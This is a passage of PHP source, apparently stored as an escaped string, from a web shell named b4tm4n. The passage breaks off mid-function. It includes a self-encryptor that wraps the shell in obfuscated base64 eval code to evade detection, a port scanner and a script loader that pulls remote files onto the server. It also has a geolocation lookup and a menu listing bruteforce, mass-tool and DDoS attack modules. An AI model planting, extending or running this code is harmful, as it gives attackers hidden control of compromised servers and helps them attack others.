target='_blank'>%s</a></td>\r\n\t\t\t\t\t\t\t\t<td><center>%s</center></td>\r\n\t\t\t\t\t\t\t\t</tr>\",\r\n\t\t\t\t\t\t\t\tsubstr(realpath(\$key),0,strrpos(realpath(\$key),_)),\r\n\t\t\t\t\t\t\t\tsubstr(realpath(\$key),0,strrpos(realpath(\$key),_)),\r\n\t\t\t\t\t\t\t\tsubstr(realpath(\$key),0,strrpos(realpath(\$key),_)),\r\n\t\t\t\t\t\t\t\trealpath(\$key),\r\n\t\t\t\t\t\t\t\trealpath(\$key),\r\n\t\t\t\t\t\t\t\tbasename(realpath(\$key)),\r\n\t\t\t\t\t\t\t\tGetFileTime(realpath(\$key),'modify')\r\n\t\t\t\t\t\t);\r\n\r\n\t\t\t\t\t\t\$res_++;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\r\n\t\t\tprintf(\"\r\n\t\t\t\t\t<form class='new' method=POST action='?x=find'>\r\n\t\t\t\t\t\t<input type='text' name='find-value' id='find-action' value='%s'/><input type='submit' name='find-button' value='Find'/>\r\n\t\t\t\t\t\t<label style='margin-left:10px'><font class='on'>Find: '%s' | Found's: %s</font></label>\t\r\n\t\t\t\t\t</form>\r\n\t\t\t\t\t<div class='auto-number'>\r\n\t\t\t\t\t\t<table class='table sortable'>\r\n\t\t\t\t\t\t\t<thead>\r\n\t\t\t\t\t\t\t\t<tr>\r\n\t\t\t\t\t\t\t\t\t<th class='sorttable_nosort' width='15'>No.</th>\r\n\t\t\t\t\t\t\t\t\t<th>Directory</th>\r\n\t\t\t\t\t\t\t\t\t<th>Name</th>\r\n\t\t\t\t\t\t\t\t\t<th>Modified</th>\r\n\t\t\t\t\t\t\t\t</tr>\r\n\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t</table>\r\n\t\t\t\t\t</div>\",\$_REQUEST['find-value'],\$_REQUEST['find-value'],\$res_,\$result);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tprint \"<form class='new' method=POST action='?x=find'>\r\n\t\t\t\t\t\t<input type='text' name='find-value'/><input type='submit' name='find-button' value='Find'/>\r\n\t\t\t\t\t\t<label style='margin-left:10px'><font color='red'>Whoops, Nothing to Found's !</font></label>\r\n\t\t\t\t\t</form>\";\r\n\t\t}\r\n\t}\r\n\tif(\$_REQUEST['x']==\"update\")\r\n\t{\r\n\t\t\$link_update='https://raw.githubusercontent.com/k4mpr3t/b4tm4n/master/bat.php';\r\n\t\t\$current_version=2.7; //New Version Released\r\n\r\n\t\tif(\$config['debug']==true)\r\n\t\t{\r\n\t\t\t\$latest_version=\$current_version+0.1; //Test Update latest version -/+ 0.1\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\$git_script=GetUrlContent(\$link_update);\r\n\t\t\t\$get_version=strpos(\$git_script,\"current_version\");\r\n\t\t\t\$version=substr(\$git_script,\$get_version+16,3);\r\n\t\t\t\$latest_version=is_numeric(\$version)?\$version:\$current_version;\r\n\t\t}\r\n\r\n\t\t\$status=\"\";\r\n\t\tif((float)\$latest_version>(float)\$current_version)\r\n\t\t{\r\n\t\t\tif(\$config['debug']==true)\r\n\t\t\t{\r\n\t\t\t\t\$status.='New Version Available '.\$latest_version.'<br>Setting Debug to False for Activate this Feature';\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$status.='New Version Available '.\$latest_version.'<br>Download -> [<font class=\"on\"><a href=\"'.\$link_update.'\" target=\"_blank\">link</a></font>]';\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\$status.='Latest Version '.\$current_version;\r\n\t\t}\r\n\r\n\t\tPrintf(\"<div id='update'>\r\n\t\t\t\t\t<a href='https://www.gnu.org/licenses/gpl-3.0.txt' target='_blank' title='License'>\r\n\t\t\t\t\t\t<img src='https://www.gnu.org/graphics/lgplv3-88x31.png'/>\r\n\t\t\t\t\t</a><br><br>%s\r\n\t\t\t\t</div>\",\$status);\r\n\t}\r\n\tif(\$_REQUEST['x']==\"self-encryptor\")\r\n\t{\r\n\t\tif(\$php_script=htmlentities(@file_get_contents(__FILE__)))\r\n\t\t{\r\n\t\t\t\$asu=strpos(\$php_script,\$_SESSION[\"action\"][\"password\"]);\r\n\t\t\t\$temp=substr(\$php_script,\$asu+48);\r\n\t\t\t\$rand=\"\\\$\".substr(str_shuffle(\"abcdefghijklmnopqrstuvwxyz\"),0,rand(1,3));\r\n\t\t\t\$rand2=\"\\\$\".substr(str_shuffle(\"abcdefghijklmnopqrstuvwxyz\"),0,rand(2,5));\r\n\t\t\t\$_a=\"b\";\$_b=\"a\";\$_c=\"s\";\$_d=\"e\";\$_e=\"6\";\$_f=\"4\";\r\n\t\t\t\$_g=\"_\";\$_h=\"e\";\$_i=\"n\";\$_j=\"c\";\$_k=\"o\";\$_l=\"d\";\$_m=\"e\";\r\n\t\t\t\$b64e=\$_a.\$_b.\$_c.\$_d.\$_e.\$_f.\$_g.\$_h.\$_i.\$_j.\$_k.\$_l.\$_m;\r\n\t\t\t\$b64d=\$_a.\$_b.\$_c.\$_d.\$_e.\$_f.\$_g.\$_l.\$_m.\$_j.\$_k.\$_l.\$_m;\r\n\t\t\t\$b64=array(\r\n\t\t\t\t'\"\\142\\141\\163\\x65\\66\\x34\\137\\x64\\x65\\x63\\157\\144\\145\"',\r\n\t\t\t\t'strrev(\"ed\".\"oce\".\"d_4\".\"6es\".\"ab\")',\r\n\t\t\t\t'strrev(\"e\".\"doc\".\"ed_\".\"46e\".\"sab\")',\r\n\t\t\t\t'\"b\".\"as\".\"e6\".\"4_\".\"d\".\"ec\".\"o\".\"de\"',\r\n\t\t\t\t'\"ba\".\"se\".\"6\".\"4_d\".\"e\".\"cod\".\"e\"' \r\n\t\t\t);\r\n\t\t\t\$rand_b64=array_rand(\$b64);\r\n\t\t\t\$rand3=\$b64[\$rand_b64];\r\n\t\t\t\$var1=\$rand.'=\"'.\$_SESSION[\"action\"][\"username\"].':'.\$_SESSION[\"action\"][\"password\"].'\";';\r\n\t\t\t\$var2=\$rand2.'='.\$rand3.';';\r\n\t\t\t\$var=array(\r\n\t\t\t\t\$var1.\$var2,\r\n\t\t\t\t\$var2.\$var1\r\n\t\t\t);\r\n\t\t\t\$rand_var=array_rand(\$var);\r\n\t\t\t\$rand4=\$var[\$rand_var];\r\n\t\t\t\$self=preg_replace(\"/\\\\\\\$x_/\",\$rand,\$temp); // Change Variable \$x_ to Random \r\n\t\t\t\$src_='';\r\n\t\t\t\$src_.='<?php ';\r\n\t\t\t\$src_.=\$rand4;\r\n\t\t\t\$src_.='@eval('.\$rand2.'(\"';\r\n\t\t\t\$src_.=\$b64e(htmlspecialchars_decode(\$self));\r\n\t\t\t\$src_.='\"))';\r\n\t\t\t\$src_.='?>';\r\n\t\t\t\$name=!empty(\$_REQUEST['name'])?\$_REQUEST['name']:'bat_encrypt.php';\r\n\t\t\t\$file=dirname(__FILE__)._.\$name;\r\n\t\t\t\$op=fopen(\$file,'w+');\r\n\t\t\tfwrite(\$op,\$src_);\r\n\t\t\tfclose(\$op);\r\n\t\t\tprintf(\"<center class='on'>SELF ENCRYPT CREATED !!!</center>\r\n\t\t\t\t\t<center class='on'>\r\n\t\t\t\t\t\tLink -> <a href='%s' target='_blank'><u>%s</u></a>\r\n\t\t\t\t\t</center>\",GetUrlFromPath(\$file),\$name);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tprint \"<center class='off'>SELF ENCRYPT ENABLE !!!</center>\";\r\n\t\t}\r\n\t}\r\n}\r\n\r\n/* START CUSTOM TOOLZ */\r\nif(any(\"z\",\$_REQUEST))\r\n{\r\n\t\$z=\$_REQUEST['z'];\r\n\r\n\tprint MenuTools(array(\r\n\t\"target-map\"=>array(\"title\"=>\"Target Map\",\"ver\"=>\"2.0\",\"auth\"=>\"k4mpr3t\"),\r\n\t\"port-scanner\"=>array(\"title\"=>\"Scan Port\",\"ver\"=>\"1.0\",\"auth\"=>\"k4mpr3t\"),\r\n\t\"script-loader\"=>array(\"title\"=>\"Script Loader\",\"ver\"=>\"1.0\",\"auth\"=>\"k4mpr3t\"),\r\n\t\"encryptor\"=>array(\"title\"=>\"Encryptor\",\"ver\"=>\"1.1\",\"auth\"=>\"k4mpr3t\"),\r\n\t\"form-bruteforces\"=>array(\"title\"=>\"Form Bruteforces\",\"ver\"=>\"1.0\",\"auth\"=>\"k4mpr3t\"),\r\n\t\"login-bruteforces\"=>array(\"title\"=>\"Login Bruteforces\",\"ver\"=>\"1.0\",\"auth\"=>\"k4mpr3t\"),\r\n\t\"mass-tools\"=>array(\"title\"=>\"Mass Tools\",\"ver\"=>\"1.0\",\"auth\"=>\"k4mpr3t\"),\r\n\t\"ddos-attack\"=>array(\"title\"=>\"DDOS Attack\",\"ver\"=>\"2.0\",\"auth\"=>\"k4mpr3t\"),\r\n\t));\r\n\r\n\tprint \"<div id='tools'>\";\r\n\r\n\tif(empty(\$z))\r\n\t{\r\n\t\tprintf(\"<div id='thanks'>\r\n\t\t\t\t\t<h2>Nothing Is Secure...</h2>\r\n\t\t\t\t\t<h3>WHY SO serious ?!</h3>\r\n\t\t\t\t</div>\");\r\n\t}\r\n\tif(\$z==\"target-map\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t\t <h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t\t <h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t\t </div>\";\r\n\r\n\t\tprintf(\"<div id='target-map'>\r\n\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t<input type='text' id='map-ip' value='%s'/>\r\n\t\t\t\t<input type='submit' value='Trace' onclick=\\\"return getAjax(true,'target-info','POST','?z=target-map&ip='+document.getElementById('map-ip').value);\\\"/><br>\r\n\t\t\t</form>\r\n\t\t</div>\r\n\t\t<div id='target-info' class='result'></div>\",gethostbyname(http_host));\r\n\r\n\t\tif(any(\"ip\",\$_REQUEST))\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$ip=!empty(\$_REQUEST['ip']) ? \$_REQUEST['ip'] : gethostbyname(http_host);\r\n\t\t\t\$valid=filter_var(\$ip,FILTER_VALIDATE_IP) or die('Invalid IP Address');\r\n\t\t\tif(\$_REQUEST['ip']==gethostbyname(http_host)) \r\n\t\t\t{\r\n\t\t\t\t\$url=B64D(\"zSI9xWleO7odODUdzH4qy79ezmMeyr1=\");\r\n\t\t\t\t\$geoip=GetUrlContent(\$url);\r\n\t\t\t\t\$json=json_decode(\$geoip,true);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t\$url=sprintf(B64D(\"zSI9xWleO7odODUdzH4qy79ezmMeyr1=\").\"%s\",\$ip);\r\n\t\t\t\t\$geoip=GetUrlContent(\$url);\r\n\t\t\t\t\$json=json_decode(\$geoip,true);\r\n\t\t\t}\r\n\t\t\t\$url=sprintf(B64D(\"zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa\").\"?q=%s,%s&z=10&output=embed\",\$json['lat'],\$json['lon']);\r\n\t\t\tprintf(\"<div class='divide'>\r\n\t\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t\t\t<tr><td>AS</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>City</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Country</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Country Code</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>ISP</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Latitude</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Logitude</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t\t\t<tr><td>Origin</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>IP</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Region</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Region Name</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Timezone</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Zip</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t\t<tr><td>Status</td><td>%s</td></tr>\r\n\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<iframe src='%s' width='100%%' height='345' frameBorder='0'><iframe>\",\r\n\t\t\t\t\t\$json['as'],\r\n\t\t\t\t\t\$json['city'],\r\n\t\t\t\t\t\$json['country'],\r\n\t\t\t\t\t\$json['countryCode'],\r\n\t\t\t\t\t\$json['isp'],\r\n\t\t\t\t\t\$json['lat'],\r\n\t\t\t\t\t\$json['lon'],\r\n\t\t\t\t\t\$json['org'],\r\n\t\t\t\t\t\$json['query'],\r\n\t\t\t\t\t\$json['region'],\r\n\t\t\t\t\t\$json['regionName'],\r\n\t\t\t\t\t\$json['timezone'],\r\n\t\t\t\t\t\$json['zip'],\r\n\t\t\t\t\t\$json['status'],\r\n\t\t\t\t\t\$url);\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$z==\"port-scanner\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t\t <h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t\t <h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t\t </div>\";\r\n\r\n\t\tprintf(\"<div id='port-scan'>\r\n\t\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t\t<label>Host Port</label><input type='text' id='ip-port' value='%s'/><br>\r\n\t\t\t\t\t\t<label>Start Port</label><input type='text' id='start-port' value='1'/><br>\r\n\t\t\t\t\t\t<label>End Port</label><input type='text' id='end-port' value='65535'/><br>\r\n\t\t\t\t\t\t<label>Methode</label><select id='scan-port'><option value='1'>socket_connect</option><option value='2'>fsockopen</option></select><br>\r\n\t\t\t\t\t\t<input type='submit' onclick=\\\"return getAjax(true,'port-result','POST','?z=port-scanner&x=scan-port&ip='+document.getElementById('ip-port').value+'&sp='+document.getElementById('start-port').value+'&ep='+document.getElementById('end-port').value+'&mtd='+document.getElementById('scan-port').value);\\\" value=Scan />\r\n\t\t\t\t\t\t<input type='submit' onclick=\\\"return ajaxAbort(true,'port-result')\\\" value=Cancel />\r\n\t\t\t\t\t</form>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div id='port-result' class='result'></div>\",gethostbyname(http_host));\r\n\r\n\t\tif(any(\"x\",\$_REQUEST)&&\$_REQUEST['x']==\"scan-port\")\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$host=\$_REQUEST['ip'];\r\n\t\t\t\$from=\$_REQUEST['sp'];\r\n\t\t\t\$to =\$_REQUEST['ep'];\r\n\t\t\t\$mtd =\$_REQUEST['mtd'];\r\n\t\t\tswitch(\$mtd)\r\n\t\t\t{\r\n\t\t\t\tcase '1':\r\n\t\t\t\t\tif(function_exists('socket_create'))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP); \r\n\t\t\t\t\t\tfor(\$conn_port=\$from;\$conn_port <=\$to;\$conn_port++)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$conn=@socket_connect(\$socket ,\$host,\$conn_port);\r\n\t\t\t\t\t\t\tif(\$conn) \r\n\t\t\t\t\t\t\t{ \r\n\t\t\t\t\t\t\t\tprint \"<br>port \$conn_port open\";\r\n\t\t\t\t\t\t\t\tsocket_close(\$socket);\r\n\t\t\t\t\t\t\t\t\$socket=@socket_create(AF_INET ,SOCK_STREAM ,SOL_TCP);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprint \"Error socket_connect<br>\";\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t\tcase '2':\r\n\t\t\t\t\tfor(\$conn_port=\$from;\$conn_port <=\$to;\$conn_port++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\$conn=@fsockopen(\$host,\$conn_port);\r\n\t\t\t\t\t\tif(\$conn)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tprint \"<br>port \$conn_port open\";\r\n\t\t\t\t\t\t\tfclose(\$conn);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t\tprint \"<br>Scan Finish.\";\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$z==\"script-loader\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t\t <h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t\t <h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t\t </div>\";\r\n\r\n\t\t\$path=dirname(__FILE__)._.'script-loader';\r\n\t\tif(!is_dir(\$path)) mkdir(\$path,0755);\r\n\r\n\t\t\$recur=new RecursiveIteratorIterator(\r\n\t\t new RecursiveDirectoryIterator(\$path),\r\n\t\t RecursiveIteratorIterator::LEAVES_ONLY \r\n\t\t);\r\n\r\n\t\t\$result=\"\";\r\n\t\tforeach (\$recur as \$key => \$val) \r\n\t\t{\r\n\t\t\tif(basename(\$key)!=\"..\"&&basename(\$key)!=\".\")\r\n\t\t\t{\r\n\t\t\t\t\$result.=sprintf(\"<tr>\r\n\t\t\t\t\t\t<td></td>\r\n\t\t\t\t\t\t<td><a href='%s' target='_blank'>%s</a></td>\r\n\t\t\t\t\t\t<td><center>%s</center></td>\r\n\t\t\t\t\t\t</tr>\",\r\n\t\t\t\t\t\tGetUrlFromPath(realpath(\$key)),\r\n\t\t\t\t\t\tbasename(realpath(\$key)),\r\n\t\t\t\t\t\tGetFileTime(realpath(\$key),'modify')\r\n\t\t\t\t);\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tprintf(\"<div id='script-loader'>\r\n\t\t\t\t\t<div class='divide'>\r\n\t\t\t\t\t\t<div class='divide-left'>\r\n\t\t\t\t\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t\t\t\t\t<label>Url</label><input type='text' id='url-source' value=''/><br>\r\n\t\t\t\t\t\t\t\t<label>Filename</label><input type='text' id='file-name' value=''/><br>\r\n\t\t\t\t\t\t\t\t<input type='submit' onclick=\\\"return getAjax(true,'download-result','POST','?z=script-loader&url='+document.getElementById('url-source').value+'&filename='+document.getElementById('file-name').value);\\\"/><br>\r\n\t\t\t\t\t\t\t\t<div id='download-result' class='result'></div>\r\n\t\t\t\t\t\t\t</form>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t<div class='divide-right'>\r\n\t\t\t\t\t\t\t<fieldset>\r\n\t\t\t\t\t\t\t\t<legend>List's</legend>\r\n\t\t\t\t\t\t\t\t<div class='auto-number'>\r\n\t\t\t\t\t\t\t\t\t<table class='table'>\r\n\t\t\t\t\t\t\t\t\t<thead><tr><th>No.</th><th>Name</th><th>Modified</th>\r\n\t\t\t\t\t\t\t\t\t<tbody>%s</tbody>\r\n\t\t\t\t\t\t\t\t\t</table>\r\n\t\t\t\t\t\t\t\t</div>\r\n\t\t\t\t\t\t\t</fieldset>\r\n\t\t\t\t\t\t</div>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>\",\$result);\r\n\r\n\t\tif(any(\"url\",\$_REQUEST)&&any(\"filename\",\$_REQUEST))\r\n\t\t{\r\n\t\t\tob_clean();\r\n\t\t\t\$url=\$_REQUEST['url'];\r\n\t\t\t\$filename=\$_REQUEST['filename'];\r\n\t\t\t\$dest=rtrim(\$path,_)._.\$filename;\r\n\t\t\tif(GetUrlExists(\$url)&&!empty(\$filename))\r\n\t\t\t{\r\n\t\t\t\tif(GetDownloadUrl(\$url,\$dest))\r\n\t\t\t\t{\r\n\t\t\t\t\t\$url=GetUrlFromPath(\$dest);\r\n\t\t\t\t\tprintf(\"Success -> <a href='\$url' target='_blank'><u>Link</u></a>\");\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tprint \"<br>Failed\";\r\n\t\t\t\t}\r\n\t\t\t\tprint \"<br>Finish\";\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tprint \"<br>Mistakes\";\r\n\t\t\t}\r\n\t\t\texit;\r\n\t\t}\r\n\t}\r\n\tif(\$z==\"encryptor\")\r\n\t{\r\n\t\tprint \"<div class='tools-header'>\r\n\t\t\t\t <h3>\".\$menu_tools[\$z]['title'].\" v\".\$menu_tools[\$z]['ver'].\"</h3>\r\n\t\t\t\t <h3> by: \".\$menu_tools[\$z]['auth'].\"</h3>\r\n\t\t\t </div>\";\r\n\r\n\t\tprintf(\"<div id='script-loader'>\r\n\t\t\t<form onsubmit='return false;' class='new'>\r\n\t\t\t\t<div class='hash-control'>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='basic' checked><label>Basic</label>\r\n\t\t\t\t\t\t<select id='basic-hash'>\r\n\t\t\t\t\t\t\t<option value='md5'>Md5</option>\r\n\t\t\t\t\t\t\t<option value='asc'>Char</option>\r\n\t\t\t\t\t\t\t<option value='chr'>Ascii</option>\r\n\t\t\t\t\t\t\t<option value='sha1'>Sha1</option>\r\n\t\t\t\t\t\t\t<option value='crc32'>Crc32</option>\r\n\t\t\t\t\t\t\t<option value='B64E'>B64E</option>\r\n\t\t\t\t\t\t\t<option value='B64D'>B64D</option>\r\n\t\t\t\t\t\t\t<option value='urlencode'>URL Encode</option>\r\n\t\t\t\t\t\t\t<option value='urldecode'>URL Decode</option>\r\n\t\t\t\t\t\t\t<option value='strlen'>String Length</option>\r\n\t\t\t\t\t\t\t<option value='strrev'>String Reverse</option>\r\n\t\t\t\t\t\t\t<option value='base64_encode'>Base64 Encode</option>\r\n\t\t\t\t\t\t\t<option value='base64_decode'>Base64 Decode</option>\r\n\t\t\t\t\t\t\t<option value='entties'>Htmlentities</option>\r\n\t\t\t\t\t\t\t<option value='spechar'>Htmlspecialchars</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='extra'><label>Extra</label>\r\n\t\t\t\t\t\t<select id='extra-hash'>\r\n\t\t\t\t\t\t\t<option value='asc-hex'>Ascii => Hex</option>\r\n\t\t\t\t\t\t\t<option value='asc-bin'>Ascii => Binary</option>\r\n\t\t\t\t\t\t\t<option value='hex-asc'>Hex => Ascii</option>\r\n\t\t\t\t\t\t\t<option value='hex-bin'>Hex => Binary</option>\r\n\t\t\t\t\t\t\t<option value='bin-asc'>Binary => Ascii</option>\r\n\t\t\t\t\t\t\t<option value='bin-hex'>Binary => Hex</option>\r\n\t\t\t\t\t\t</select>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='crypt'><label>Crypt</label>\r\n\t\t\t\t\t\t<input type='text' id='crypt-salt' name='salt' placeholder='\\\$alt'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='radio' name='encr' value='hash'><label>Hash</label>\r\n\t\t\t\t\t\t<select id='hash-hash'><option value='md2'>md2</option><option value='md4'>md4</option><option value='md5'>md5</option><option value='sha1'>sha1</option><option value='sha256'>sha256</option><option value='sha384'>sha384</option><option value='sha512'>sha512</option><option value='ripemd128'>ripemd128</option><option value='ripemd160'>ripemd160</option><option value='ripemd256'>ripemd256</option><option value='ripemd320'>ripemd320</option><option value='whirlpool'>whirlpool</option><option value='tiger128,3'>tiger128,3</option><option value='tiger160,3'>tiger160,3</option><option value='tiger192,3'>tiger192,3</option><option value='tiger128,4'>tiger128,4</option><option value='tiger160,4'>tiger160,4</option><option value='tiger192,4'>tiger192,4</option><option value='snefru'>snefru</option><option value='gost'>gost</option><option value='adler32'>adler32</option><option value='crc32'>crc32</option><option value='crc32b'>crc32b</option><option value='haval128,3'>haval128,3</option><option value='haval160,3'>haval160,3</option><option value='haval192,3'>haval192,3</option><option value='haval224,3'>haval224,3</option><option value='haval256,3'>haval256,3</option><option value='haval128,4'>haval128,4</option><option value='haval160,4'>haval160,4</option><option value='haval192,4'>haval192,4</option><option value='haval224,4'>haval224,4</option><option value='haval256,4'>haval256,4</option><option value='haval128,5'>haval128,5</option><option value='haval160,5'>haval160,5</option><option value='haval192,5'>haval192,5</option><option value='haval224,5'>haval224,5</option><option value='haval256,5'>haval256,5</option></select>\r\n\t\t\t\t\t\t<input type='checkbox' id='hash-raw'/> Raw\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash'>\r\n\t\t\t\t\t\t<input type='submit' onclick=\\\"\r\n\t\t\t\t\t\turl='';\r\n\t\t\t\t\t\ttextencode=window.btoa(document.getElementById('hashtext').value);\r\n\t\t\t\t\t\tradios=document.getElementsByName('encr');\r\n\t\t\t\t\t\tfor(var i=0,length=radios.length;i<length;i++){\r\n\t\t\t\t\t\t\tif (radios[i].checked){\r\n\t\t\t\t\t\t\t\tswitch(radios[i].value){\r\n\t\t\t\t\t\t\t\t\tcase 'basic':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=basic&hash='+document.getElementById('basic-hash').value+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\tcase 'extra':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=extra&hash='+document.getElementById('extra-hash').value+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\tcase 'crypt':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=crypt&salt='+document.getElementById('crypt-salt').value+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\tcase 'hash':\r\n\t\t\t\t\t\t\t\t\t\turl='?z=encryptor&opt=hash&hash='+document.getElementById('hash-hash').value+'&raw='+document.getElementById('hash-raw').checked+'&text-encode='+textencode;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\treturn getAjax(false,'hashresult','POST',url);\r\n\t\t\t\t\t\t\\\"/>\r\n\t\t\t\t\t\t<input type='submit' onclick=\\\"\r\n\t\t\t\t\t\t\ttempi=document.getElementById('hashresult').value;\r\n\t\t\t\t\t\t\ttempi1=document.getElementById('hashtext').value;\r\n\t\t\t\t\t\t\tdocument.getElementById('hashtext').value=tempi.trim();\r\n\t\t\t\t\t\t\tdocument.getElementById('hashresult').value=tempi1.trim();\r\n\t\t\t\t\t\t\\\" value='Swap'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>\r\n\t\t\t\t<div class='hash-capture'>\r\n\t\t\t\t\t<div class='hash-capture-left'>\r\n\t\t\t\t\t\t<label>String</label><textarea id='hashtext'></textarea>\r\n\t\t\t\t\t\t<input type='submit' onclick=\\\"\r\n\t\t\t\t\t\t\tdocument.getElementById('hashtext').value='';\r\n\t\t\t\t\t\t\\\" value='Clear'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t\t<div class='hash-capture-right'>\r\n\t\t\t\t\t\t<label>Result</label><textarea id='hashresult'></textarea>\r\n\t\t\t\t\t\t<input type='submit' onclick=\\\"\r\n\t\t\t\t\t\t\tdocument.getElementById('hashresult').value='';\r\n\t\t\t\t\t\t\\\" value='Clear'/>\r\n\t\t\t\t\t</div>\r\n\t\t\t\t</div>\r\n\t\t\t</form>\r\n\t\t</div>\");\r\n\r\n\t\tfunction chr_asc(\$str){\r\n\t\t\t\$asc='';\r\n\t\t\tfor(\$i=0;\$i<strlen(\$str);\$i++) \r\n\t\t\t\t\$asc.=ord(\$str{\$i}).' ';\r\n\t\t\treturn rtrim(\$asc);\r\n\t\t}\r\n\r\n\t\tfunction asc_chr(\$asc){\r\n\t\t\t\$str='';\r\n\t\t\tif (strpos(\$asc,' ')){\r\n\t\t\t\t\$exps=explode(' ',\$asc);\r\n\t\t\t\tforeach(\$exps as \$exp)\r\n\t\t\t\t\t\$str.=chr(\$exp);\r\n\t\t\t}else{\r\n\t\t\t\t\$str=chr(\$asc);\r\n\t\t\t}\r\n\t\t\treturn \$str;\r\n\t\t}\r\n\r\n\t\tfunction asc_hex(\$asc){\r\n\t\t\t\$hex='';\r\n\t\t\tfor (\$i=0;\$i<strlen(\$asc);\$i++) \r\n\t\t\t\t\$hex.=sprintf(\"%02x\",ord(substr(\$asc,\$i,1)));\r\n\t\t\treturn \$hex;\r\n\t\t}\r\n\r\n\t\tfunction hex_asc(\$hex){\r\n\t\t\t\$asc='';\r\n\t\t\tfor 